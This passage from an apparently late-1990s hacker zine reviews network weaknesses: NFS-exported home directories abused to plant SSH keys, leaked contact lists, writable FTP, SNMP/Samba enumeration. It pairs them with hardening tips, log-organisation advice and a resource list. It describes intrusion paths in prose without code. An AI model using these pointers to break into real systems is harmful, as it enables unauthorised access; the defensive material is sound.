- SSH and NFS, if you are exporting a home directory to the world which is a big
- no-no an attacker can append their identity.pub file in your authorized_keys
- file. This will allow them to login with their login password. You really
- shouldnt need to export a file system off of a system on the internet. I would
- move the NFS server into the internal network and share out the filesystem to s
- specific list of hosts or networks. Also besides clamping down on NFS add tcp
- wrappers to your SSH daemon, it can be run from inetd with sshd's -i option.
- WWW with telnet/ssh. Be sure if you list contacts and email addresses that none
- of them reside locally on the web server. If they do then you just gave out
- half of your password file. A list of contacts is a list of logins. An
- anonymous ftp site with write able directories and / or sensitive material. This
- is becomes an electronic form of dumpster diving. Old emails, software
- packages, sensitive files etc.. snmp and samba, snmp can be used to get the
- netbios/machine name. Then samba can be probed for shares. Sharing an
- uploadable ftp directory with a webserver. Scripts can be uploaded and executed
- remotely through the webserver. (PHP,ASP,PERL,SHTML etc..) Sorting /
- Organization Logs are normally kept in flat text files, this make them easy to
- manage and sort. Depending on how savvy you are you might want to create
- database or store them in comma delimited format. I organize log files using the
- following directory structure. Network -----> Hostname -----> nmap_output
- -----> showmount -e output -----> snmpwalk_output ..etc..
-
-
- I suggest logging problems by network, OS, Vulnerability,hostname.
-
- 192.168.0 ------> IRIX
- ------>
- open_lp_account
- 192.168.0.23
- 192.168.0.64
- 192.168.0.203
-
- This way with each directory change you get more detail.
-
- X. Resources
-
- Web.
-
- Security mailing list and announcements http://www.cert.org Massive security
- site, hosts bugtraq and other security forums. http://www.securityfocus.com
- Probably the biggest security archive out there. http://packetstorm.securify.com
- Underground news and information http://www.hackernews.com A searchable index of
- RFCs, FAQs and electronic books. http://www.faqs.org/ IBM Bookmanager Book
- server. http://www.s390.ibm.com:80/bookmgr-cgi/bookmgr.cmd/print?book=bk8p7001
- The nessus project (free network security scanning tool ) http://www.nessus.org
- nmap OS detecting scanner. http://www.insecure.org
-
- Papers
-
- Holbrook. P, (1991). Site Security Handbook [Online], Available:
- http://www.cis.ohio-state.edu/htbin/rfc/rfc1244.html [1997, December 20].
- Pethia. R, (1991). Guidelines for the Secure Operation of the Internet [Online],
- Available: http://www.cis.ohio-state.edu/htbin/rfc/rfc1281.html [1997, December
- 20].
-
- Farmer. D and Venema. W, (No Date). Improving the security of your site by
- breaking into it [Online],
- Available:http://www.deter.com/unix/papers/improve_by_breakin.html [1998,
- January].
-
- Bellovin. S. M, (1993). Packets found on an internet [Online],Available:
- http://www.deter.com/unix/papers/packets_found_bellovin.ps.gz [1998, January].
-
- Bacic. E. M, (No Date). UNIX & Security [Online], Available:
- http://manitou.cse.dnd.ca/papers/Unix_Sec.html [1998, January].
-
- Smith. N. P, (1997). Stack Smashing Vulnerabilities in the UNIX operating system
- [Online], Available:
- http://millcomm.com/~nate/machines/security/stack-smashing/[1998, Febuary].
-
- Fydor, (1998) Remote OS detection via TCP/IP Stack Finger Printing [Online],
- Available: http://www.insecure.org/nmap/nmap-fingerprinting-article.html
-
- +==============================================================================+
- | Get The Latest Issues |
- | Join the Mailing List |
- | --------------------- |
- | E-mail hd-request@hackersdigest.com with the word subscribe in the |
- | subject line. |
- +==============================================================================+
- www.hackersdigest.com
-
-
-
-
-